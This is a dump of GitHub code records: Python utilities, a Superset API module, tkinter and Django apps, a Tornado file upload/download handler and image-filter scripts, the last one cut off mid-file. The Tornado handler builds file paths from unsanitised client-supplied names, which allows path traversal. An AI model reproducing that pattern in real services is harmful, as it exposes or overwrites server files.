+{"seq_id":"13474908369","text":"import os\nfrom flightmap.csvstore import csvstore\nfrom geopy import distance\nfrom rtree import index\n\n_here=os.path.split(__file__)[0]\n\n\nstore=csvstore(os.path.join(_here,\"data/openflights.airports.csv\"))\nidx=index.Index()\n\n\nfor airport in store.data :\n bbox=list([float(a) for a in [airport[\"lng\"],airport[\"lat\"],airport[\"lng\"],airport[\"lat\"]]])\n aid=int(airport[\"nr\"])\n idx.insert(aid,bbox,obj=airport)\n\n\ndef nearest_airport(lng,lat) :\n lat=float(lat)\n lng=float(lng)\n nearest=[a.object for a in idx.nearest((lng,lat,lng,lat),objects=True)]\n for airport in nearest :\n fp=(float(airport[\"lat\"]),float(airport[\"lng\"]))\n airport[\"distance\"]=distance.distance((lat,lng),fp).km\n return nearest\n\n\nif __name__=='__main__' :\n\ttests=(((8.64,52.03),\"Bielefeld\"),\n\t\t ((9.3389,54.3223),\"Hohn\" ))\n\t\t \n\tfor (p,t) in tests :\n\t\tassert(nearest_airport(*p)[0][\"town\"]==t)\n\n\tassert(nearest_airport(8.64,52.03)[0][\"town\"]==\"Bielefeld\")\n","repo_name":"mvtango/flightmap","sub_path":"bin/flightmap/airportlocator.py","file_name":"airportlocator.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"38560648494","text":"class Biblioteca:\n def __init__(self, _libros):\n self.libros = _libros\n\n #mostrar libros\n def mostrarLibros(self):\n for libro in self.libros:\n print(libro)\n\n def prestarLibros(self, nombreLibros):\n #verificar si el libro existe\n if nombreLibros in self.libros:\n print(\"Se presto el libro\", nombreLibros)\n self.libros.remove(nombreLibros)\n else:\n print(\"El libro no existe\")\n\n def agregarLibro(self, nombreLibros):\n #verificar que no exista\n if nombreLibros not in self.libros:\n print(\"Se añadio el libro\", nombreLibros)\n self.libros.append(nombreLibros)\n else:\n print(\"El libro ya existe\")\n\n\nlibros = [\"Clean Code\", \"Java\", \"Analisis\"]\n\nbiblioteca = Biblioteca(libros)\n\nwhile True:\n print(\"1) Agregar libro\")\n print(\"2) Presentar libro\")\n print(\"3) Mostrar libro\")\n print(\"4) Salir\")\n\n opcion = int(input(\"Ingres un opcion(1-4)\"))\n\n if opcion == 1:\n libro = input(\"\\nIngresa el nombre del libro\")\n biblioteca.agregarLibro(libro)\n elif opcion == 2:\n libro = input(\"\\nIngresa el nombre del libro\")\n biblioteca.prestarLibros(libro)\n elif opcion == 3:\n print(\"\\nMis libros son\")\n biblioteca.MostrarLibros(libro)\n elif opcion == 4:\n break","repo_name":"AlvinRHD/Practica_Estructura6","sub_path":"ejercicio0.py","file_name":"ejercicio0.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74953373955","text":"from sense_hat import SenseHat\nfrom time import sleep\nfrom emojis.smile import Smile\nfrom emojis.frown import Frown\nfrom emojis.neutral import Neutral\n\nclass AnimatedEmoji:\n \n def __init__(self, color1, color2, color3):\n self.__color1 = color1\n self.__color2 = color2\n self.__color3 = color3\n\n def aEmoji(self):\n sense = SenseHat()\n sense.clear()\n\n color1 = self.__color1\n color2 = self.__color2\n color3 = self.__color3\n\n emojis = [\n Smile(color1),\n Neutral(color2),\n Frown(color3)\n ]\n\n while True:\n for emoji in emojis:\n sense.set_pixels(emoji.face())\n sleep(3)\n\nr = (255, 0, 0)\ny = (255, 255, 0)\ng = (0, 255, 0)\n\ne1 = AnimatedEmoji(g, y, r)\ne1.aEmoji() ","repo_name":"ddhuy77/COSC2790_PIoT_Assignment_1","sub_path":"animatedEmoji.py","file_name":"animatedEmoji.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25165562225","text":"from __future__ import annotations\n\nimport contextlib\nimport json\nimport logging\nfrom typing import Any, TYPE_CHECKING\n\nimport simplejson\nfrom flask import current_app, g, make_response, request, Response\nfrom flask_appbuilder.api import expose, protect\nfrom flask_babel import gettext as _\nfrom marshmallow import ValidationError\n\nfrom superset import is_feature_enabled, security_manager\nfrom superset.async_events.async_query_manager import AsyncQueryTokenException\nfrom superset.charts.api import ChartRestApi\nfrom superset.charts.data.query_context_cache_loader import QueryContextCacheLoader\nfrom superset.charts.post_processing import apply_post_process\nfrom superset.charts.schemas import ChartDataQueryContextSchema\nfrom superset.commands.chart.data.create_async_job_command import (\n CreateAsyncChartDataJobCommand,\n)\nfrom superset.commands.chart.data.get_data_command import ChartDataCommand\nfrom superset.commands.chart.exceptions import (\n ChartDataCacheLoadError,\n ChartDataQueryFailedError,\n)\nfrom superset.common.chart_data import ChartDataResultFormat, ChartDataResultType\nfrom superset.connectors.sqla.models import BaseDatasource\nfrom superset.daos.exceptions import DatasourceNotFound\nfrom superset.exceptions import QueryObjectValidationError\nfrom superset.extensions import event_logger\nfrom superset.models.sql_lab import Query\nfrom superset.utils.core import create_zip, get_user_id, json_int_dttm_ser\nfrom superset.views.base import CsvResponse, generate_download_headers, XlsxResponse\nfrom superset.views.base_api import statsd_metrics\n\nif TYPE_CHECKING:\n from superset.common.query_context import QueryContext\n\nlogger = logging.getLogger(__name__)\n\n\nclass ChartDataRestApi(ChartRestApi):\n include_route_methods = {\"get_data\", \"data\", \"data_from_cache\"}\n\n @expose(\"//data/\", methods=(\"GET\",))\n @protect()\n @statsd_metrics\n @event_logger.log_this_with_context(\n action=lambda self, *args, **kwargs: f\"{self.__class__.__name__}.data\",\n log_to_statsd=False,\n )\n def get_data(self, pk: int) -> Response:\n \"\"\"\n Take a chart ID and uses the query context stored when the chart was saved\n to return payload data response.\n ---\n get:\n summary: Return payload data response for a chart\n description: >-\n Takes a chart ID and uses the query context stored when the chart was saved\n to return payload data response.\n parameters:\n - in: path\n schema:\n type: integer\n name: pk\n description: The chart ID\n - in: query\n name: format\n description: The format in which the data should be returned\n schema:\n type: string\n - in: query\n name: type\n description: The type in which the data should be returned\n schema:\n type: string\n - in: query\n name: force\n description: Should the queries be forced to load from the source\n schema:\n type: boolean\n responses:\n 200:\n description: Query result\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataResponseSchema\"\n 202:\n description: Async job details\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataAsyncResponseSchema\"\n 400:\n $ref: '#/components/responses/400'\n 401:\n $ref: '#/components/responses/401'\n 500:\n $ref: '#/components/responses/500'\n \"\"\"\n chart = self.datamodel.get(pk, self._base_filters)\n if not chart:\n return self.response_404()\n\n try:\n json_body = json.loads(chart.query_context)\n except (TypeError, json.decoder.JSONDecodeError):\n json_body = None\n\n if 
json_body is None:\n return self.response_400(\n message=_(\n \"Chart has no query context saved. Please save the chart again.\"\n )\n )\n\n # override saved query context\n json_body[\"result_format\"] = request.args.get(\n \"format\", ChartDataResultFormat.JSON\n )\n json_body[\"result_type\"] = request.args.get(\"type\", ChartDataResultType.FULL)\n json_body[\"force\"] = request.args.get(\"force\")\n\n try:\n query_context = self._create_query_context_from_form(json_body)\n command = ChartDataCommand(query_context)\n command.validate()\n except DatasourceNotFound:\n return self.response_404()\n except QueryObjectValidationError as error:\n return self.response_400(message=error.message)\n except ValidationError as error:\n return self.response_400(\n message=_(\n \"Request is incorrect: %(error)s\", error=error.normalized_messages()\n )\n )\n\n # TODO: support CSV, SQL query and other non-JSON types\n if (\n is_feature_enabled(\"GLOBAL_ASYNC_QUERIES\")\n and query_context.result_format == ChartDataResultFormat.JSON\n and query_context.result_type == ChartDataResultType.FULL\n ):\n return self._run_async(json_body, command)\n\n try:\n form_data = json.loads(chart.params)\n except (TypeError, json.decoder.JSONDecodeError):\n form_data = {}\n\n return self._get_data_response(\n command=command, form_data=form_data, datasource=query_context.datasource\n )\n\n @expose(\"/data\", methods=(\"POST\",))\n @protect()\n @statsd_metrics\n @event_logger.log_this_with_context(\n action=lambda self, *args, **kwargs: f\"{self.__class__.__name__}.data\",\n log_to_statsd=False,\n )\n def data(self) -> Response:\n \"\"\"\n Take a query context constructed in the client and return payload\n data response for the given query\n ---\n post:\n summary: Return payload data response for the given query\n description: >-\n Takes a query context constructed in the client and returns payload data\n response for the given query.\n requestBody:\n description: >-\n A query context consists of a datasource from which to fetch data\n and one or many query objects.\n required: true\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataQueryContextSchema\"\n responses:\n 200:\n description: Query result\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataResponseSchema\"\n 202:\n description: Async job details\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataAsyncResponseSchema\"\n 400:\n $ref: '#/components/responses/400'\n 401:\n $ref: '#/components/responses/401'\n 500:\n $ref: '#/components/responses/500'\n \"\"\"\n json_body = None\n if request.is_json:\n json_body = request.json\n elif request.form.get(\"form_data\"):\n # CSV export submits regular form data\n with contextlib.suppress(TypeError, json.JSONDecodeError):\n json_body = json.loads(request.form[\"form_data\"])\n if json_body is None:\n return self.response_400(message=_(\"Request is not JSON\"))\n\n try:\n query_context = self._create_query_context_from_form(json_body)\n command = ChartDataCommand(query_context)\n command.validate()\n except DatasourceNotFound:\n return self.response_404()\n except QueryObjectValidationError as error:\n return self.response_400(message=error.message)\n except ValidationError as error:\n return self.response_400(\n message=_(\n \"Request is incorrect: %(error)s\", error=error.normalized_messages()\n )\n )\n\n # TODO: support CSV, SQL query and other non-JSON types\n if (\n is_feature_enabled(\"GLOBAL_ASYNC_QUERIES\")\n and 
query_context.result_format == ChartDataResultFormat.JSON\n and query_context.result_type == ChartDataResultType.FULL\n ):\n return self._run_async(json_body, command)\n\n form_data = json_body.get(\"form_data\")\n return self._get_data_response(\n command, form_data=form_data, datasource=query_context.datasource\n )\n\n @expose(\"/data/\", methods=(\"GET\",))\n @protect()\n @statsd_metrics\n @event_logger.log_this_with_context(\n action=lambda self, *args, **kwargs: f\"{self.__class__.__name__}\"\n f\".data_from_cache\",\n log_to_statsd=False,\n )\n def data_from_cache(self, cache_key: str) -> Response:\n \"\"\"\n Take a query context cache key and return payload\n data response for the given query.\n ---\n get:\n summary: Return payload data response for the given query\n description: >-\n Takes a query context cache key and returns payload data\n response for the given query.\n parameters:\n - in: path\n schema:\n type: string\n name: cache_key\n responses:\n 200:\n description: Query result\n content:\n application/json:\n schema:\n $ref: \"#/components/schemas/ChartDataResponseSchema\"\n 400:\n $ref: '#/components/responses/400'\n 401:\n $ref: '#/components/responses/401'\n 404:\n $ref: '#/components/responses/404'\n 422:\n $ref: '#/components/responses/422'\n 500:\n $ref: '#/components/responses/500'\n \"\"\"\n try:\n cached_data = self._load_query_context_form_from_cache(cache_key)\n # Set form_data in Flask Global as it is used as a fallback\n # for async queries with jinja context\n setattr(g, \"form_data\", cached_data)\n query_context = self._create_query_context_from_form(cached_data)\n command = ChartDataCommand(query_context)\n command.validate()\n except ChartDataCacheLoadError:\n return self.response_404()\n except ValidationError as error:\n return self.response_400(\n message=_(\"Request is incorrect: %(error)s\", error=error.messages)\n )\n\n return self._get_data_response(command, True)\n\n def _run_async(\n self, form_data: dict[str, Any], command: ChartDataCommand\n ) -> Response:\n \"\"\"\n Execute command as an async query.\n \"\"\"\n # First, look for the chart query results in the cache.\n with contextlib.suppress(ChartDataCacheLoadError):\n result = command.run(force_cached=True)\n if result is not None:\n return self._send_chart_response(result)\n # Otherwise, kick off a background job to run the chart query.\n # Clients will either poll or be notified of query completion,\n # at which point they will call the /data/ endpoint\n # to retrieve the results.\n async_command = CreateAsyncChartDataJobCommand()\n try:\n async_command.validate(request)\n except AsyncQueryTokenException:\n return self.response_401()\n\n result = async_command.run(form_data, get_user_id())\n return self.response(202, **result)\n\n def _send_chart_response(\n self,\n result: dict[Any, Any],\n form_data: dict[str, Any] | None = None,\n datasource: BaseDatasource | Query | None = None,\n ) -> Response:\n result_type = result[\"query_context\"].result_type\n result_format = result[\"query_context\"].result_format\n\n # Post-process the data so it matches the data presented in the chart.\n # This is needed for sending reports based on text charts that do the\n # post-processing of data, eg, the pivot table.\n if result_type == ChartDataResultType.POST_PROCESSED:\n result = apply_post_process(result, form_data, datasource)\n\n if result_format in ChartDataResultFormat.table_like():\n # Verify user has permission to export file\n if not security_manager.can_access(\"can_csv\", \"Superset\"):\n 
return self.response_403()\n\n if not result[\"queries\"]:\n return self.response_400(_(\"Empty query result\"))\n\n is_csv_format = result_format == ChartDataResultFormat.CSV\n\n if len(result[\"queries\"]) == 1:\n # return single query results\n data = result[\"queries\"][0][\"data\"]\n if is_csv_format:\n return CsvResponse(data, headers=generate_download_headers(\"csv\"))\n\n return XlsxResponse(data, headers=generate_download_headers(\"xlsx\"))\n\n # return multi-query results bundled as a zip file\n def _process_data(query_data: Any) -> Any:\n if result_format == ChartDataResultFormat.CSV:\n encoding = current_app.config[\"CSV_EXPORT\"].get(\"encoding\", \"utf-8\")\n return query_data.encode(encoding)\n return query_data\n\n files = {\n f\"query_{idx + 1}.{result_format}\": _process_data(query[\"data\"])\n for idx, query in enumerate(result[\"queries\"])\n }\n return Response(\n create_zip(files),\n headers=generate_download_headers(\"zip\"),\n mimetype=\"application/zip\",\n )\n\n if result_format == ChartDataResultFormat.JSON:\n response_data = simplejson.dumps(\n {\"result\": result[\"queries\"]},\n default=json_int_dttm_ser,\n ignore_nan=True,\n )\n resp = make_response(response_data, 200)\n resp.headers[\"Content-Type\"] = \"application/json; charset=utf-8\"\n return resp\n\n return self.response_400(message=f\"Unsupported result_format: {result_format}\")\n\n def _get_data_response(\n self,\n command: ChartDataCommand,\n force_cached: bool = False,\n form_data: dict[str, Any] | None = None,\n datasource: BaseDatasource | Query | None = None,\n ) -> Response:\n try:\n result = command.run(force_cached=force_cached)\n except ChartDataCacheLoadError as exc:\n return self.response_422(message=exc.message)\n except ChartDataQueryFailedError as exc:\n return self.response_400(message=exc.message)\n\n return self._send_chart_response(result, form_data, datasource)\n\n # pylint: disable=invalid-name\n def _load_query_context_form_from_cache(self, cache_key: str) -> dict[str, Any]:\n return QueryContextCacheLoader.load(cache_key)\n\n def _create_query_context_from_form(\n self, form_data: dict[str, Any]\n ) -> QueryContext:\n try:\n return ChartDataQueryContextSchema().load(form_data)\n except KeyError as ex:\n raise ValidationError(\"Request is incorrect\") from ex\n except ValidationError as error:\n raise error\n","repo_name":"apache/superset","sub_path":"superset/charts/data/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":15816,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"}
+{"seq_id":"15586972622","text":"from tkinter import *\nimport datetime\nimport pandas\nfrom tkinter import ttk\n\nimport pandas as pd\n\nstore_items = {\n \"1\": [\"Vada\", 10],\n \"2\": [\"Idly\", 30]\n}\nitems = pd.read_csv('items.csv', index_col=False)\n\n\nid = 0\nddict = {\n \"ID\": [],\n \"item\": [],\n \"price\": [],\n \"quantity\": [],\n \"date\": [],\n \"time\": []\n}\ndate = (datetime.datetime.now().strftime(\"%d-%h-%Y %H-%M-%S\"))\n\ndata = pandas.DataFrame(ddict)\ntotal_price = 0\n\n\ndef add_to_csv():\n global data, label_count, id, total_price\n for each in tree.get_children():\n item = tree.item(each)['values'][0]\n quantity = tree.item(each)['values'][1]\n price = tree.item(each)['values'][2]\n # new = pandas.Series([id, item,price, quantity, date.split()[0], date.split()[1]], index=data.columns)\n # data = data.append(new, ignore_index=True)\n # new = pandas.DataFrame([id,item,quantity])\n data.loc[len(data)] = [id, item, price, quantity, date.split()[0], date.split()[1]]\n # data = pandas.concat([data,new], axis=0, ignore_index=True)\n tree.delete(each)\n id += 1\n total_price = 0\n price_label.config(text=total_price)\n\n\ndef Save():\n save = f\"./item {date}.csv\"\n data.to_csv(save)\n\n\ndef Add():\n global row, col, label_count, quantity, var_name, total_price\n var_name = f\"new_text{label_count}\"\n user_entered_item = (item_entry.get())\n if user_entered_item.isdigit():\n\n item = items.name[(items.id == int(user_entered_item)) ].values[0]\n price = items.price[(items.id == int(user_entered_item))].values[0]\n else:\n item = items.name[(items.name == user_entered_item) ].values[0]\n price = items.price[(items.name == (user_entered_item)) ].values[0]\n # ][1]\n\n quantity = int(quantity_entry.get())\n total_price += price * quantity\n # list_box.insert(END, f\"{item} {quantity}\")\n tree.insert('', END, text=\"1\", values=(item, quantity, price * quantity))\n # f\"new_text{label_count}\" = canvas.create_text(70, col, text=f\"{item} {quantity}\", font=\"Arial, 20\")\n # print(var_name)\n # print(canvas.itemcget(var_name, 'text'))\n col += 30\n # var_name = Label(tk, text=f\"{item} {quantity}\", font=(\"Arial\", 15, \"normal\"))\n # var_name.grid(row=row, column=1, columnspan=5)\n\n price_label.config(text=total_price)\n\n\n\n submit_button = Button(text=\"Submit\", command=add_to_csv)\n submit_button.place(x=1170, y=400)\n\n\n\n item_entry.delete(0, END)\n quantity_entry.delete(0, END)\n\n\ndef Delete():\n global total_price\n selected_tree = tree.selection()\n for each in selected_tree:\n price_to_remove =(tree.item(item=each)['values'][2])\n tree.delete(each)\n total_price -= price_to_remove\n price_label.config(text=total_price)\n\n\ntk = Tk()\nwidth = tk.winfo_screenwidth()\nheight = tk.winfo_screenheight()\ntk.geometry(\"%dx%d\" % (width, height))\ntk.title(\"Data Science Billing\")\n# frame = Frame(tk, width=800, height=500)\n# frame.pack_forget()\n# canvas = Canvas(width=1000, height=400, bg=\"white\")\n# canvas.create_window((0,0), window=my_frame)\nmy_frame = Frame(tk, bg=\"yellow\", width=50)\nmy_frame.grid(padx=220, pady=50, column=1, row=0)\n\n# txt = canvas.create_text(0,149,text=\"gslha\", font=\"Arial, 20\")\n# bbox = canvas.bbox(txt)\n# canvas.create_rectangle(bbo)\n#\n# hbar = Scrollbar(canvas,orient=VERTICAL)\n# hbar.place(x=900,y=400)\n# hbar.config(command=canvas.yview)\n\n# text = canvas.create_text(50, 20, text=\"Hello\", font=\"Arial, 20\")\n# canvas.grid(padx=20, pady=20,row=0, column=0)\n# canvas.place(x=50, y=10)\n\nitem_Label = Label(tk, 
text=\"Item\", font=(\"Arial\", 20, \"normal\"))\nitem_Label.place(x=520, y=525)\n# item_Label.grid(row=1, column=0)\n\nquantity_Label = Label(tk, text=\"Quantity\", font=(\"Arial\", 20, \"normal\"))\n# quantity_Label.grid(row=1, column=2)\nquantity_Label.place(y=525, x=850)\n# price_Label = Label(text=\"Price\", font=(\"Arial\", 20, \"normal\"))\n# price_Label.grid(row=0, column=3)\n\nitem_entry = Entry(tk, width=50)\n# item_entry.grid(row=2, column=1, sticky=\"E\", padx=12, ipady=5)\nitem_entry.place(x=350, y=575, height=30)\n\nquantity_entry = Entry(tk, width=20)\n# quantity_entry.grid(row=2, column=2, padx=12, ipady=5)\nquantity_entry.place(x=820, y=575, height=30)\n\ntotal_price_label = Label(tk, text=\"Total Price:\", font=(\"Arial\", 20, \"normal\"))\ntotal_price_label.place(x=820,y=450, height=20)\n# price_entry = Entry(width=20, justify=\"right\")\n# price_entry.grid(row=1, column=3, padx=12, ipady=5)\n\n\nadd_button = Button(tk, text=\"Add\", command=Add)\n# add_button.grid(row=1, column=4, columnspan=4, padx=20, ipady=2, pady=20, ipadx=50)\nadd_button.place(x=620, y=625, height=30)\n\ndelete_button = Button(tk, text=\"Delete\", command=Delete)\ndelete_button.place(x=760, y=625, height=30)\n\ntree = ttk.Treeview(my_frame, columns=(\"c1\", \"c2\", \"c3\"), show=\"headings\", height=18)\ntree.column('# 1', anchor=CENTER, width=500)\ntree.heading(\"# 1\", text=\"Item\")\ntree.column('# 2', anchor=CENTER, width=200)\ntree.heading(\"# 2\", text=\"Quantity\")\ntree.column('# 3', anchor=CENTER, width=200)\ntree.heading(\"# 3\", text=\"Price\")\n\ntree.grid(sticky=\"nwes\")\n\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"1\",\"1\"))\n# tree.insert('', END, text=\"1\", values=(\"1\",\"2\",\"1\"))\nprice_label = Label(tk, text=total_price, font=(\"Arial\", 20, \"normal\"))\nprice_label.place(x=970, y=450, height=20)\n\nmyscrollbar = Scrollbar(my_frame, orient=VERTICAL, command=tree.yview)\nmyscrollbar.grid(row=0, column=1, sticky=\"news\")\ntree.config(yscrollcommand=myscrollbar.set)\n# print(tree.item(tree.get_children()[0])['values'][0])\n# for each in tree.item(tree.get_children()[0]).values():\n# print(type(each))\n# myscrollbar.\n# print(tree.get_children())\n# my_frame.conf\n\n\n# my_frame.pack()\n\nrow = 4\ncol = 20\nlabel_count = 0\n\nsave = Button(text=\"Save\", command=Save)\n# save.grid(row=row + 1, column=1, columnspan=5, pady=20, ipadx=20, ipady=5)\nsave.place(x=1270, y=400)\n# print(quantity_entry.get())\n# item = (item_entry.get())\ntk.columnconfigure(1, minsize=3)\n\ntk.mainloop()\n","repo_name":"PoorneshShiva/Data_Science_Billing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33997241033","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def insertionSortList(self, head):\n if not head: return head\n fh = ListNode(0)\n fh.next = head\n cur = head\n while cur.next:\n if cur.next.val < cur.val:\n pre = fh\n while pre.next.val < cur.next.val:\n pre = pre.next\n t = cur.next\n cur.next = t.next\n t.next = pre.next\n pre.next = t\n else:\n cur = cur.next\n return fh.next\n\nif __name__ == '__main__':\n head=ListNode(-1)\n head.next=ListNode(3)\n head.next.next=ListNode(5)\n head.next.next.next=ListNode(2)\n head=Solution().insertionSortList(head)\n while head:\n print(head.val)\n head=head.next\n pass\n","repo_name":"javayhu/XSolutions","sub_path":"python/InsertionSortList.py","file_name":"InsertionSortList.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"12538511164","text":"from django import forms\nfrom .models import Todo\nfrom .validators import *\nimport re\n\nclass TodoForm(forms.ModelForm):\n title = forms.CharField(\n label='제목',\n widget=forms.TextInput(\n attrs={\n 'placeholder': '제목 입력',\n 'class': 'form-control'}\n ),\n validators=[first_validator],\n required=True\n )\n \n\n content = forms.CharField(\n label='내용',\n widget=forms.Textarea(\n attrs={\n 'placeholder': '내용 입력',\n 'class': 'my-content form-control'}\n ),\n required=True\n )\n def clean_content(self):\n content = self.cleaned_data.get('content')\n if content:\n content = re.sub(r'[a-zA-z]+', '', content) #영어제거.. 애초에 경고하는 법은 어떻게 할까?\n return content\n\n \n priority = forms.IntegerField(\n label='우선 순위',\n widget=forms.NumberInput(\n attrs={\n 'min': 1, 'max': 5, 'value': 3,\n 'class': 'form-control'}\n ),\n required=True\n )\n\n deadline = forms.DateField(\n label='마감 기한',\n widget=forms.DateInput(\n attrs={\n 'class': 'form-control',\n 'type': 'date'}\n ),\n required=True\n )\n class Meta:\n model = Todo\n exclude = ('completed',)","repo_name":"illson97/TIL_errday","sub_path":"TIL_django/TIL_django10_exercise/todos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"73446195073","text":"#coding: utf8\n\nimport tornado.ioloop\nimport tornado.web\nimport os\nfrom utils import *\n\nclass UploadFileHandler(tornado.web.RequestHandler):\n\n\tdef get(self,file = \"\"):\n\n\t\tif file == \"\":\n\t\t\tself.redirect(\"/\")\n\n\t\tprefix = file.split('.')[1]\n\n\t\ttype = \"application/octet-stream\"\n\n\t\tif prefix == \"jpg\":\n\t\t\ttype = \"image/jpeg\"\n\n\t\telif prefix == \"png\":\n\t\t\ttype = \"image/png\"\n\n\t\telif prefix == \"bmp\":\n\t\t\ttype = \"application/x-bmp\"\n\n\t\telif prefix == \"gif\":\n\t\t\ttype = \"image/gif\"\n\n\t\telif prefix == \"mp3\":\n\t\t\ttype = \"audio/mp3\"\n\n\t\telif prefix == \"mp4\":\n\t\t\ttype = \"video/mpeg4\"\n\n\t\telif prefix == \"html\" or prefix == \"txt\" or prefix == \"htm\":\n\t\t\ttype = \"text/html\"\n\n\n\t\tself.set_header ('Content-Type', type)\n\n\t\t#self.set_header ('Content-Disposition', 'attachment; filename='+file)\n\n\t\t#读取的模式需要根据实际情况进行修改\n\t\twith open(cur_dir() + C('upload')+file, 'rb') as f:\n\t\t\twhile True:\n\t\t\t\tdata = f.read(1000)\n\t\t\t\tif not data:\n\t\t\t\t\tbreak\n\t\t\t\tself.write(data)\n\n\t\t#记得有finish哦\n\t\tself.finish()\n\n\tdef post(self,file = \"\"):\n\n\t\tupload_path = cur_dir() + C('upload') \n\n\t\t#提取表单中‘name’为‘file’的文件元数据\n\t\tfile_metas=self.request.files['file']\t\n\t\tfor meta in file_metas:\n\n\t\t\tfilename=meta['filename']\n\t\t\tfilepath=os.path.join(upload_path,filename)\n\n\t\t\t#有些文件需要已二进制的形式存储,实际中可以更改\n\t\t\twith open(filepath,'wb') as up:\t \n\t\t\t\tup.write(meta['body'])\n\n\t\t\tself.write('finished!')","repo_name":"alexmerser/mylog","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9501875208","text":"#!/usr/bin/env python3\n\n#author: Haim\n\nimport os.path\nimport re\nimport sys\n\n\ndef Usage():\n print(\"Usage: grep.py phrase path\")\n\n \nif len(sys.argv) != 3:\n Usage()\n exit(1)\n\nphrase = sys.argv[1]\npath = sys.argv[2]\n\nif phrase == \"\" or path == \"\":\n print(\"At least one of the parameters is empty!\")\n Usage()\n exit(2)\n\nif not os.path.isfile(path):\n print(\"File doesn't exist!\")\n Usage()\n exit(3)\n\nwith open(path,\"r\") as file:\n for line in file:\n if re.search(phrase, line):\n print(line)","repo_name":"haimxx/DevOps","sub_path":"ex5/q1/b/grep2.py","file_name":"grep2.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70496187395","text":"from PIL import Image\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport cv2\n\n#fig, axes = plt.subplots(2, 2, figsize=(7,5))\ndef pool(image, fn, kernel=5, stride=2):\n h_prev, w_prev, n = image.shape\n\n h = int((h_prev - kernel) / stride) + 1\n w = int((w_prev - kernel) / stride) + 1\n\n downsampled = np.zeros((h, w, n))\n\n for i in range(n):\n curr_y = out_y = 0\n # slide the max pooling window vertically across the image\n while curr_y + kernel <= h_prev:\n curr_x = out_x = 0\n # slide the max pooling window horizontally across the image\n while curr_x + kernel <= w_prev:\n # choose the maximum value within the window at each step and store it to the output matrix\n\n downsampled[out_y, out_x, i] = fn(image[curr_y:curr_y + kernel,\n curr_x:curr_x + kernel, i])\n\n curr_x += stride\n out_x += 1\n curr_y += stride\n out_y += 1\n\n return downsampled\n\n\ndef scan(image, filt, stride=1):\n kernel = filt.shape[0]\n h_prev, w_prev, n = image.shape\n\n h = int((h_prev - kernel) / stride) + 1\n w = int((w_prev - kernel) / stride) + 1\n downsampled = np.zeros((h, w, n))\n\n for i in range(n):\n curr_y = out_y = 0\n # slide the max pooling window vertically across the image\n while curr_y + kernel <= h_prev:\n curr_x = out_x = 0\n # slide the max pooling window horizontally across the image\n while curr_x + kernel <= w_prev:\n # choose the maximum value within the window at each step and store it to the output matrix\n\n downsampled[out_y, out_x, i] = np.sum(filt *\n image[curr_y:curr_y + kernel,\n curr_x:curr_x + kernel, i])\n\n curr_x += stride\n out_x += 1\n curr_y += stride\n out_y += 1\n\n return downsampled\n\nimg = cv2.imread('images/unmarked/masks/Female Archback 4.jpg')\nblur = cv2.bilateralFilter(img,40,100,100)\n\n\n# print(blur2.shape)\n# cv2.imshow('blur', blur2)\n# cv2.imshow('original', img)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n#plt.imsave('images/unmarked/filter/Female Archback 4.jpg', blur)\ndef detectEdges(arg, size=5):\n img = pool(arg[:, :, :2], np.mean, kernel=50)\n hor = np.zeros((size, size))\n hor[size // 2 - 1, :] = -10\n hor[size // 2, :] = 10\n\n vert = np.zeros((size, size))\n vert[:, size // 2 - 1] = -10\n vert[:, size // 2] = 10\n\n img1 = scan(img[:, :, :2], hor)\n img2 = scan(img[:, :, :2], vert)\n\n img1 = np.abs(img1)\n img2 = np.abs(img2)\n\n img = img2 + img1\n return np.sum(img, axis=2)\n\ndef auto_canny(image, sigma=0.33):\n # compute the median of the single channel pixel intensities\n v = np.median(image)\n\n # apply automatic Canny edge detection using the computed median\n lower = int(max(0, (1.0 - sigma) * v))\n upper = int(min(255, (1.0 + sigma) * v))\n edged = cv2.Canny(image, lower, upper)\n\n # return the edged image\n return edged\n# blur2 = auto_canny(blur)\n# blur2 = auto_canny(blur)\n#axes[1,1] = sns.heatmap(detectEdges(blur), 